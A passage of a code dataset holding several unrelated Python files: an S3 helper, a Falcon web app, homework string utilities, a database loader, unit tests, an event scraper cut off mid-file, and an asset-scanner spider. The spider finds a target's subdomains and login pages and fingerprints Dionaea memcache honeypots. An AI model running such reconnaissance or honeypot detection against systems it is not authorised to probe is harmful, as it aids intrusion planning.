boto3.client('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config, region_name = region)\n else:\n self.resource = boto3.resource('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config)\n self.client = boto3.client('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config)\n\n def get_buckets(self):\n\n buckets_dict = self.client.list_buckets()\n return [k for k in buckets_dict['Buckets']]\n\n\n def get_bucket_list(self, filters = None):\n\n buckets = self.get_buckets()\n if not filters:\n return [k['Name'] for k in buckets]\n return [k['Name'] for k in buckets if filters in k['Name']]\n\n def delete_buckets(self, bucket_list):\n\n result = True\n for name in bucket_list:\n try:\n bucket = self.resource.Bucket(name)\n bucket.objects.all().delete()\n bucket.delete()\n except Exception as e:\n logger.error('Exception while deleting Bucket: {}, Exception: {}'.format(name, e), To_Screen = True)\n result = False\n else:\n logger.info('Deleted Bucket: {}'.format(name), To_Screen = True)\n\n return result\n\n def resource_cleanup(self, resources):\n\n all_names = self.get_bucket_list()\n name_list = all_names if resources else []\n if not resources.get('all'):\n name_list = [k for k in all_names if k in resources.get('name', [])]\n resource_filter = resources.get('filter', {})\n for fltr in resource_filter.get('name', []):\n if not resource_filter.get('ignore_case'):\n name_list.extend([k for k in all_names if fltr in k])\n else:\n name_list.extend([k for k in all_names if fltr.lower() in k.lower()])\n name_list = list(set(name_list))\n name_list = [k for k in name_list if k not in resources.get('exclude_name', [])]\n\n return self.delete_buckets(bucket_list = name_list)\n\n\n def upload_file(self, local_file_name, bucket_name, remote_file_name):\n\n '''\n Create a bucket in the specified bucket with remote file name.\n '''\n\n # Delete bucket if already exist\n if bucket_name in self.get_bucket_list():\n self.delete_buckets([bucket_name])\n\n # Create Bucket\n self.client.create_bucket(Bucket = bucket_name)\n self.client.upload_file(local_file_name, bucket_name, remote_file_name)\n\n # Check file uploaded\n if bucket_name not in self.get_bucket_list():\n raise s3BucketNotFound('Bucket not created: {}'.format(bucket_name))\n\n bucket = self.resource.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix = remote_file_name))\n if not objs:\n raise s3FileNotFound('File not uploaded: {}'.format(remote_file_name))\n\n object_acl = self.resource.ObjectAcl(bucket_name, remote_file_name)\n response = object_acl.put(ACL='public-read')\n\n return \"https://s3.amazonaws.com/{}/{}\".format(bucket_name, remote_file_name)\n\n def upload_file_gov(self, local_file_name, bucket_name, remote_file_name, region):\n\n '''\n Create a bucket in the specified bucket with remote file name.\n '''\n\n # Delete bucket if already exist\n if bucket_name in self.get_bucket_list():\n self.delete_buckets([bucket_name])\n\n # Create Bucket\n self.client.create_bucket(Bucket=bucket_name,CreateBucketConfiguration={'LocationConstraint': region},)\n self.resource.meta.client.upload_file(local_file_name, bucket_name, remote_file_name)\n\n # Check file uploaded\n if bucket_name not in self.get_bucket_list():\n raise s3BucketNotFound('Bucket not created: {}'.format(bucket_name))\n\n bucket = self.resource.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix = remote_file_name))\n if not objs:\n raise s3FileNotFound('File not uploaded: {}'.format(remote_file_name))\n\n object_acl = self.resource.ObjectAcl(bucket_name, remote_file_name)\n response = object_acl.put(ACL='public-read')\n\n return \"https://s3-{}.amazonaws.com/{}/{}\".format(region,bucket_name, remote_file_name)\n\n\n","sub_path":"lib/aws_S3.py","file_name":"aws_S3.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54801967","text":"''' Exports create_app. '''\n\nimport falcon\nfrom szurubooru import api, errors, middleware\n\ndef _on_auth_error(ex, _request, _response, _params):\n raise falcon.HTTPForbidden(\n title='Authentication error', description=str(ex))\n\ndef _on_validation_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Validation error', description=str(ex))\n\ndef _on_search_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Search error', description=str(ex))\n\ndef _on_integrity_error(ex, _request, _response, _params):\n raise falcon.HTTPConflict(\n title='Integrity violation', description=ex.args[0])\n\ndef _on_not_found_error(ex, _request, _response, _params):\n raise falcon.HTTPNotFound(title='Not found', description=str(ex))\n\ndef _on_processing_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Processing error', description=str(ex))\n\ndef create_method_not_allowed(allowed_methods):\n allowed = ', '.join(allowed_methods)\n def method_not_allowed(request, response, **_kwargs):\n response.status = falcon.status_codes.HTTP_405\n response.set_header('Allow', allowed)\n request.context.output = {\n 'title': 'Method not allowed',\n 'description': 'Allowed methods: %r' % allowed_methods,\n }\n return method_not_allowed\n\ndef create_app():\n ''' Create a WSGI compatible App object. '''\n falcon.responders.create_method_not_allowed = create_method_not_allowed\n\n app = falcon.API(\n request_type=api.Request,\n middleware=[\n middleware.RequireJson(),\n middleware.ContextAdapter(),\n middleware.DbSession(),\n middleware.Authenticator(),\n ])\n\n user_list_api = api.UserListApi()\n user_detail_api = api.UserDetailApi()\n tag_category_list_api = api.TagCategoryListApi()\n tag_category_detail_api = api.TagCategoryDetailApi()\n tag_list_api = api.TagListApi()\n tag_detail_api = api.TagDetailApi()\n tag_merge_api = api.TagMergeApi()\n tag_siblings_api = api.TagSiblingsApi()\n password_reset_api = api.PasswordResetApi()\n\n app.add_error_handler(errors.AuthError, _on_auth_error)\n app.add_error_handler(errors.IntegrityError, _on_integrity_error)\n app.add_error_handler(errors.ValidationError, _on_validation_error)\n app.add_error_handler(errors.SearchError, _on_search_error)\n app.add_error_handler(errors.NotFoundError, _on_not_found_error)\n app.add_error_handler(errors.ProcessingError, _on_processing_error)\n\n app.add_route('/users/', user_list_api)\n app.add_route('/user/{user_name}', user_detail_api)\n app.add_route('/tag-categories/', tag_category_list_api)\n app.add_route('/tag-category/{category_name}', tag_category_detail_api)\n app.add_route('/tags/', tag_list_api)\n app.add_route('/tag/{tag_name}', tag_detail_api)\n app.add_route('/tag-merge/', tag_merge_api)\n app.add_route('/tag-siblings/{tag_name}', tag_siblings_api)\n app.add_route('/password-reset/{user_name}', password_reset_api)\n\n return app\n","sub_path":"server/szurubooru/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"93566444","text":"'''working with strings'''\r\nfrom typing import IO, Iterator\r\n\r\n# def reverse_string(inp: str) -> str:\r\n# new_str = ''\r\n# # char = inp[::-1]:\r\n# if inp == '':\r\n# raise ValueError('empty string')\r\n# else:\r\n# for char in inp:\r\n# new_str = char + new_str\r\n \r\n# # print(char)\r\n# return new_str\r\n\r\ndef reverse_string(inp: str) -> str:\r\n '''reversing the input string'''\r\n new_str: str = ''\r\n try:\r\n for i in range(len(inp)-1,-1,-1):\r\n new_str += inp[i]\r\n return new_str\r\n except:\r\n raise ValueError('input is not a string')\r\n\r\n\r\ndef sub_string(target: str, main_string: str) -> int:\r\n '''checking if target substring is in main string and where it is'''\r\n \r\n # if main_string and target and target in main_string: # if main_string and target are not empty and target is in main_string\r\n # count: int = 0\r\n # for offset, char in enumerate(main_string):\r\n # if target[0] == char:\r\n # new_string: str = main_string[offset : offset + len(target)]\r\n # if target == new_string:\r\n # count: int = offset\r\n # return count\r\n # else:\r\n # return -1\r\n\r\n # for i in range(len(main_string) - len(target) + 1):\r\n # if main_string[i:i+len(target)] == target:\r\n # return i\r\n # return -1\r\n\r\n return main_string.find(target, main_string.find(target) + 1)\r\n\r\nprint(sub_string('he', 'hello'))\r\n\r\ndef find_second(target: str, string: str) -> int:\r\n '''checking if target substring is in main string twice or more and return the positon of the second'''\r\n\r\n count: int = string.find(target, 0)\r\n if target in string[count + 1: ]:\r\n new_count: int = string.find(target, count + 1)\r\n return new_count\r\n else:\r\n return -1\r\n\r\n\r\ndef get_lines(path: str) -> Iterator[str]:\r\n '''open file and reading lines step by step'''\r\n try:\r\n fp: IO = open(path, 'r', encoding='utf-8')\r\n except FileNotFoundError:\r\n raise FileNotFoundError(f\"Can not open {path}\")\r\n # print (f\"Can not open {path}\")\r\n else:\r\n with fp:\r\n for line in fp:\r\n # line: str = line.strip('\\n')\r\n line: str = line.rstrip('\\n')\r\n # line: str = line.strip()\r\n\r\n while line.endswith(\"\\\\\"):\r\n # line: str = line.strip(\"\\\\\\n\") + fp.readline().strip(\"\\n\")\r\n # line: str = line.strip(\"\\\\\\n\") + fp.readline().rstrip(\"\\n\")\r\n line: str = line[:-1] + next(fp).rstrip(\"\\n\") # strip the trailing \\ and join with the next line\r\n\r\n\r\n # if line == '':\r\n # continue\r\n\r\n # here, lines have been combined so look for a comment\r\n\r\n if not line.startswith('#'):\r\n yield line.split('#')[0] # split returns a list with everything before the #\r\n \r\n # if '#' in line:\r\n # if line.startswith('#'):\r\n # continue\r\n # else:\r\n # line: str = line.split('#', maxsplit=1)[0]\r\n # yield line\r\n\r\n# print(list(get_lines('test1.txt')))","sub_path":"HW05_Himanshu.py","file_name":"HW05_Himanshu.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74518492","text":"#!/usr/bin/python3\n\n####################################################\n# module: CharFreqMap.py\n# author: vladimir kulyukin\n# creates a dictionary that maps all\n# characters in a given file to their frequencies\n# in the file.\n####################################################\n\nclass CharFreqMap(object):\n @staticmethod\n def computeCharFreqMap(fp):\n char_freq_map = {}\n with open(fp, encoding='utf-8') as f:\n while True:\n c = f.read(1)\n if not c:\n break\n if c in char_freq_map:\n char_freq_map[c] += 1\n else:\n char_freq_map[c] = 1\n return char_freq_map\n","sub_path":"CS3430-ScientificComputingPython/hw12/CharFreqMap.py","file_name":"CharFreqMap.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301690376","text":"import json\nimport os.path\nimport psycopg2\n\npath = \"./api/all.json\"\nport = 5432\n\nwith open(\"./credentials/postgres\") as credentials:\n content = credentials.readlines()\ncontent = [x.strip() for x in content]\n\n\ndef drop_if_present():\n drop_if_present = \"DROP TABLE IF EXISTS star_wars;\"\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], user=content[2], password=content[3])\n cur = conn.cursor()\n print(\"dropping table 'star wars'\")\n cur.execute(drop_if_present)\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\ndef insert(object):\n fields = [\"id\", \"name\", \"height\", \"mass\", \"gender\", \"homeworld\", \"wiki\", \"image\", \"dateCreated\", \"dateDestroyed\", \"destroyedLocation\", \"creator\",\n \"manufacturer\", \"model\", \"class\", \"sensorColor\", \"platingColor\", \"equipment\", \"born\", \"bornLocation\", \"died\", \"diedLocation\",\n \"species\", \"hairColor\", \"eyeColor\", \"skinColor\", \"cybernetics\", \"affiliations\", \"masters\", \"apprentices\", \"formerAffiliations\"]\n insert_sql = \"INSERT INTO star_wars(\" + ', '.join(map(str, fields)) + \") VALUES (\" + \"%s, \" * (len(fields)-1) + \"%s\" \");\"\n print(insert_sql)\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], user=content[2], password=content[3])\n cur = conn.cursor()\n cur.execute(insert_sql, object)\n print(\"insert successful\")\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\ndef create_table():\n create_sql = \"\"\"\n CREATE TABLE star_wars (\n id bigserial PRIMARY KEY,\n name text NOT NULL,\n height float,\n mass integer,\n gender text, \n homeworld text,\n wiki text,\n image text,\n dateCreated integer,\n dateDestroyed integer,\n destroyedLocation text,\n creator text,\n manufacturer text,\n model text,\n class text, \n sensorColor text,\n platingColor text,\n equipment text,\n born integer,\n bornLocation text,\n died integer,\n diedLocation text,\n species text,\n hairColor text,\n eyeColor text,\n skinColor text,\n cybernetics text,\n affiliations text[],\n masters text[],\n apprentices text[],\n formerAffiliations text[]\n );\n \"\"\"\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], user=content[2], password=content[3])\n cur = conn.cursor()\n cur.execute(create_sql)\n print(\"table 'star wars' created\")\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\nif create_table() == -1:\n drop_if_present()\n assert create_table() == 0\n\nif os.path.isfile(path):\n print(\"found file: \" + path)\n\nwith open(path) as json_file:\n fields = [\"id\", \"name\", \"height\", \"mass\", \"gender\", \"homeworld\", \"wiki\", \"image\", \"dateCreated\", \"dateDestroyed\", \"destroyedLocation\", \"creator\",\n \"manufacturer\", \"model\", \"class\", \"sensorColor\", \"platingColor\", \"equipment\", \"born\", \"bornLocation\", \"died\", \"diedLocation\",\n \"species\", \"hairColor\", \"eyeColor\", \"skinColor\", \"cybernetics\", \"affiliations\", \"masters\", \"apprentices\", \"formerAffiliations\"]\n json_data = json.load(json_file)\n for items in json_data:\n items_tuple = [None] * len(fields)\n for key, value in items.items():\n try:\n index = fields.index(key)\n items_tuple[index] = value\n except(ValueError) as error:\n print(error)\n insert(tuple(items_tuple))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182571559","text":"\"\"\"fileformat.py unit tests.\"\"\"\nimport io\nimport pytest\nfrom unittest.mock import mock_open\nimport pypyr.utils.filesystem as filesystem\n\n# ------------------------ FileRewriter ---------------------------------------\n\n\ndef test_filerewriter_abstract():\n \"\"\"Can't instantiate FileRewriter.\"\"\"\n with pytest.raises(TypeError):\n filesystem.FileRewriter('blah')\n\n\ndef test_filerewriter_in_to_out_abstract():\n \"\"\"Can't invoke in_to_out on abstract base.\"\"\"\n class MyRewriter(filesystem.FileRewriter):\n def in_to_out(self, in1):\n super().in_to_out('blah', 'blah')\n\n x = MyRewriter('blahinit')\n\n with pytest.raises(NotImplementedError):\n x.in_to_out('blah')\n# ------------------------ END of FileRewriter --------------------------------\n\n# ------------------------ ObjectRepresenter ----------------------------------\n\n\ndef test_objectrepresenter_abstract():\n \"\"\"Can't instantiate ObjectRepresenter.\"\"\"\n with pytest.raises(TypeError):\n filesystem.ObjectRepresenter()\n\n\ndef test_object_representer_abc_methods():\n \"\"\"Abstract methods do nothing.\"\"\"\n class MyRepresenter(filesystem.ObjectRepresenter):\n def load(self, file):\n super().load(file)\n\n def dump(self, file, payload):\n super().dump(file, payload)\n\n x = MyRepresenter()\n x.load(None)\n x.dump(None, None)\n\n\ndef test_json_representer():\n \"\"\"Json representer load and dump payload.\"\"\"\n representer = filesystem.JsonRepresenter()\n\n in_json = '{\"a\": \"b\", \"c\": [1,2,true]}'\n obj = representer.load(mock_open(read_data=in_json)())\n\n assert obj == {'a': 'b', 'c': [1, 2, True]}\n\n with io.StringIO() as out_text:\n mock_output = mock_open()\n mock_output.return_value.write.side_effect = out_text.write\n representer.dump(mock_output(), obj)\n\n assert out_text.getvalue() == ('{\\n'\n ' \"a\": \"b\",\\n'\n ' \"c\": [\\n'\n ' 1,\\n'\n ' 2,\\n'\n ' true\\n'\n ' ]\\n'\n '}')\n\n\ndef test_yaml_representer():\n \"\"\"Yaml representer load and dump payload.\"\"\"\n representer = filesystem.YamlRepresenter()\n\n in_yaml = ('a: b\\n'\n 'c:\\n'\n ' - 1\\n'\n ' - 2\\n'\n ' - True\\n')\n obj = representer.load(mock_open(read_data=in_yaml)())\n\n assert obj == {'a': 'b', 'c': [1, 2, True]}\n\n with io.StringIO() as out_text:\n mock_output = mock_open()\n mock_output.return_value.write.side_effect = out_text.write\n representer.dump(mock_output(), obj)\n\n assert out_text.getvalue() == ('a: b\\n'\n 'c:\\n'\n ' - 1\\n'\n ' - 2\\n'\n ' - true\\n')\n\n# ------------------------ END ObjectRepresenter ------------------------------\n\n# ------------------------ is_same_file --------------------------------------\n\n\ndef test_is_same_file_none():\n \"\"\"Empty paths not same.\"\"\"\n assert not filesystem.is_same_file(None, '')\n\n\n# ------------------------ END is_same_file -----------------------------------\n","sub_path":"tests/unit/pypyr/utils/filesystem_test.py","file_name":"filesystem_test.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"66624035","text":"import re\nimport json\nimport memcache\nimport requests\nfrom urllib.parse import urlparse\n\ndomainCN_pattern = re.compile( # 中国开放注册的域名\n r'https?://[^\\s]*.cn[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.com[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.top[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.vip[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.top[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.xyz[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.ltd[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.art[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.edu[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.wang[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.beer[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.cloud[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.store[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.online[a-zA-Z0-9/?=#&]*'\n)\n\n# 本地资源|本域资源\n# 1、 =https://antiy.cn/static/images/user.admin_1002.svg\n# 2、 =//antiy.cn/static/images/user.admin_1002.svg\n# src=\"./js-plugin/jquery-ui/jquery-ui-1.8.23.custom.min.js\"\nresource_local_pattern = re.compile(\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.js\"|' # 编程语言\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.py\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.sh\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.go\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.exe\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.asp\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.php\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.java\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.gz\"|' # 包\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.tar\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.jpg\"|' # 前端静态资源\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.svg\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.ico\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.png\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.css\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.s?html?\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.txt\"|' # 配置文件\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.xml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.conf\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.json\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.yaml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.toml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.docx?\"|' # 文档\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.pptx?\"',\n re.IGNORECASE\n)\n\n\nclass WebSpider:\n def __init__(self):\n self.login_page = set() # 集合就已经自动去重\n self.resource_path = set()\n self.subdomain = set()\n self.urls = set()\n self.headers = {'user-agent': \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\"}\n\n # URL发现\n def url_find(self, text, ip=None, domain=None): # 无需提供端口\n if domain: # 提取本域url\n pattern = re.compile('https?://[^\\s]*{}:?[a-zA-Z0-9/\\?=#&_\\.]*'.format(domain))\n result = set(re.findall(pattern, text))\n self.urls = self.urls | result\n elif ip:\n pattern = re.compile('https?://[^\\s]*{}:?[a-zA-Z0-9/\\?=#&_\\.]*'.format(ip))\n result = set(re.findall(pattern, text))\n self.urls = self.urls | result\n\n # 子域发现 域名专供\n def subdomain_find(self, domain, text):\n '''\n 1、从url分析取的\n 2、从信息取的 cdn.www.cnblogs.cn\n '''\n if not domain:\n return []\n pattern = re.compile('[a-zA-Z0-9\\.]+{}'.format(domain))\n result = set(re.findall(pattern, text))\n self.subdomain = self.subdomain | result\n\n def resource_find(self, urls=None, text=None):\n # 1、本域|本IP资源发现, 从url中进行parse\n if urls:\n for url in urls:\n attr = urlparse(url)\n path = attr.path\n # login页面发现\n if len(path.split('login')) > 1 or len(path.split('sign')) > 1:\n print(attr)\n self.login_page.add(\"{}://{}{}\".format(attr.scheme, attr.netloc, path.strip()))\n # 资源发现\n array = re.findall('.*\\.[a-zA-Z]*', path)\n if array:\n self.resource_path.add(self.strip_suffix(array[0]))\n\n # 2、本地资源发现 ''\n elif text:\n array = re.findall(resource_local_pattern, text)\n array = map(self.strip_suffix, array)\n self.resource_path = self.resource_path | set(array)\n\n def strip_suffix(self, item):\n aa = re.sub('^=\"\\.?/?|\"$|^\\./|^/', '', item)\n return aa\n\n def test(self, url, domain=None, ip=None):\n resp = requests.get(url, headers=self.headers, verify=False, timeout=5)\n text = resp.text\n if domain:\n self.url_find(text, domain=domain) # url发现\n self.subdomain_find(domain, text) # 子域匹配\n self.resource_find(urls=self.urls) # 用url来匹配\n self.resource_find(text=text) # 用网页text来匹配\n elif ip:\n self.url_find(text, ip=ip)\n self.resource_find(urls=self.urls)\n self.resource_find(text=text)\n print('==' * 40)\n print(json.dumps(list(self.login_page)))\n print('==' * 40)\n print(json.dumps(list(self.urls)))\n print('==' * 40)\n print(json.dumps(list(self.resource_path)))\n print('==' * 40)\n print(json.dumps(list(self.subdomain)))\n\n\nclass MemcacheHoneypot:\n def __init__(self):\n self.result = {'name': '', 'desc': []}\n\n def get_stats(self, stats):\n for item in stats:\n if type(item) != dict:\n continue\n if item['version'] == '1.4.25':\n self.result['name'] = \"Memcache honeypot of dionaea\"\n self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n if item['libevent'] == '2.0.22-stable':\n self.result['name'] = \"Memcache honeypot of dionaea\"\n self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n # if item['rusage_system'] = \"0.233\":\n if item['rusage_system'] == \"0.110544\":\n self.result['name'] = \"Memcache honeypot of dionaea\"\n self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n\n def run(self):\n mc = memcache.Client(['127.0.0.1:11211'], debug=True)\n stats = mc.get_stats()\n\n # 黑洞, 只进不出\n if not stats:\n self.result[\"name\"] = \"low interaction honeypot of memcache\",\n self.result[\"desc\"] = [\"nothing data, it looks like a low interaction honeypot\"]\n\n # 校验参数特征\n self.get_stats()\n\n return self.result\n\n\nif __name__ == \"__main__\":\n ws = WebSpider()\n # ws.test(\"https://antiy.cn/\", \"antiy.cn\")\n # ws.test(\"https://cnblogs.com/\", \"cnblogs.com\")\n ws.test(\"http://172.31.50.252:8081/\", ip=\"172.31.50.252\")\n","sub_path":"micro/service/asset_scanner/modules/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398447626","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/29 16:35\n# @Author:martin\n# @File:__init__.py.py\nimport xlrd\ntestdata = xlrd.open_workbook('testdata.xlsx') #打开表格,参数文件路径\ntable = testdata.sheet_by_name('Sheet1') #通过表中名称获取表\nnrows = table.nrows#获取总行数\nncols= table.ncols #获取总列数\nprint(table.row_values(0)) #获的第一行的值\nprint(table.col_values(0))# 获的第一列的值\n","sub_path":"testing/jiekou/commen/excel_.py","file_name":"excel_.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640820454","text":"import ast\nimport boto3\nimport bs4\nimport csv\nfrom datetime import datetime\nimport re\nimport requests\nimport json\nimport unicodedata\n\nbucket = 'aimeeb-datasets-public'\nis_local = False\ncurrent_date = datetime.today()\nurl=\"https://caseytrees.org/events/\"+current_date.strftime(\"%Y-%m\")+\"/\"\n\n\ndef fetch_page(options):\n url = options['url']\n html_doc = requests.get(url).content\n return html_doc\n\ndef parse_event_cost(event_cost):\n if event_cost == \"Donation\":\n event_cost = event_cost.replace(\"Donation\",\"0\")\n return event_cost\n else:\n currency_re = re.compile(r'(?:[\\$]{1}[,\\d]+.?\\d*)')\n event_cost = re.findall(currency_re, event_cost)\n if len(event_cost) > 0:\n event_cost = event_cost[0].split(\".\")[0].replace(\"$\",'')\n event_cost = ''.join(s for s in event_cost if s.isdigit())\n return event_cost\n else:\n return ''\n\ndef handle_ans_page(soup):\n events_url = soup.find_all('td')\n websites = []\n categoryclasses = {}\n #extracts the url for the events\n for row in events_url:\n for column in row.find_all('div'):\n temp = column.text.strip()\n if(temp.isdigit()):\n pass\n else:\n websites.append(column.find('a')['href'])\n # not sure if this is a good way. to get the exact tags we might have to call the url and get the values\n # under event tag\n category_classes_dict = ast.literal_eval(column['data-tribejson'])\\\n ['categoryClasses'].split(\" \")\n event_category_classes=\"\"\n for each_categoryclasses in category_classes_dict:\n if(\"tribe-events-category-\" in each_categoryclasses):\n if(event_category_classes != \"\"):\n event_category_classes += \",\"\n event_category_classes += each_categoryclasses.replace(\"tribe-events-category-\",\"\")\n categoryclasses[column.find('a')['href']] = event_category_classes\n\n #extracts the complete details about events\n events_content = soup.find_all('script',{'type':'application/ld+json'})\n events_complete_data = set()\n for event in events_content:\n for website in websites:\n if(website in event.text.strip()):\n events_complete_data.add(event.text.strip())\n\n #converts the string to dict\n try:\n events_complete_data = ast.literal_eval(list(events_complete_data)[0])\n except:\n return []\n\n #extracts the required fields in the output schema\n result_all_event = []\n for con in events_complete_data:\n events_data = {}\n # some html string is present in event name default adding this to format it\n events_name_data = bs4.BeautifulSoup(con.get('name',''))\n events_data['Event Name'] = events_name_data.get_text()\n events_data['Event Website'] = con.get('url','')\n events_data['Event Category'] = categoryclasses.get(events_data['Event Website'],'')\n start = datetime.strptime(con['startDate'][:-6],\"%Y-%m-%dT%H:%M:%S\")\n end = datetime.strptime(con['endDate'][:-6],\"%Y-%m-%dT%H:%M:%S\")\n events_data['Event Start Date'] = start.strftime('%Y-%m-%d')\n events_data['Event End Date'] = end.strftime('%Y-%m-%d')\n events_data['Event Start Time'] = start.strftime('%H:%M:%S')\n events_data['Event End Time'] = end.strftime('%H:%M:%S')\n events_data['Timezone'] = \"America/New_York\"\n events_data['Event Venue Name'] = con['location']['name']\n events_data['Event Featured Image'] = con.get('image','')\n events_data['Event Description'] = unicodedata.normalize('NFKD', get_event_description(events_data['Event Website']))\n events_data['Event Cost'] = parse_event_cost(con['offers']['price'])\n events_data['Event Currency Symbol'] = \"$\"\n events_data['All Day Event'] = False\n organizer = con.get('organizer', False)\n if(organizer):\n events_data['Event Organizers'] = organizer.get('name',\"\")\n else:\n events_data['Event Organizers'] = \"\"\n # commenting addresss, latitude and longitude fields for now as The WordPress Event plugin doesn't\n # expect these fields, but we might eventually use their Map plugin, which would need those geo fields \n # events_data['address'] = ' '.join(str(x) for x in con['location']['address'].values())\n # commenting the latitude and longtide fields\n # events_data['latitude'] = \"no location\"\n # events_data['longitude'] = \"no location\"\n # location = con.get('location', False)\n # if(location):\n # geo = location.get('geo', False)\n # if(geo):\n # events_data['latitude'] = geo.get('latitude',\"no latitude\")\n # events_data['longitude'] = geo.get('longitude',\"no longitude\")\n # else:\n # events_data['latitude'] = \"no geo\"\n # events_data['longitude'] = \"no geo\"\n result_all_event.append(events_data)\n try:\n #checks if next month calender is present and passes the url to handle_ans_page function\n next = soup.find('li', {'class': 'tribe-events-nav-next'}).a['href']\n page = fetch_page({'url': next})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n result_all_event.extend(handle_ans_page(soup))\n except:\n pass\n\n return result_all_event\n\n\n\ndef get_event_description(url):\n page = fetch_page({'url': url})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n events_url = soup.find('meta', {'property': 'og:description'})['content']\n return events_url\n\n\ndef handler(event, context):\n url = event['url']\n source_name = event['source_name']\n page = fetch_page({'url': url})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n event_output = handle_ans_page(soup)\n filename = '{0}-results.csv'.format(source_name)\n if not is_local:\n with open('/tmp/{0}'.format(filename), mode = 'w') as f:\n writer = csv.DictWriter(f, fieldnames = event_output[0].keys())\n writer.writeheader()\n [writer.writerow(event) for event in event_output]\n s3 = boto3.resource('s3')\n 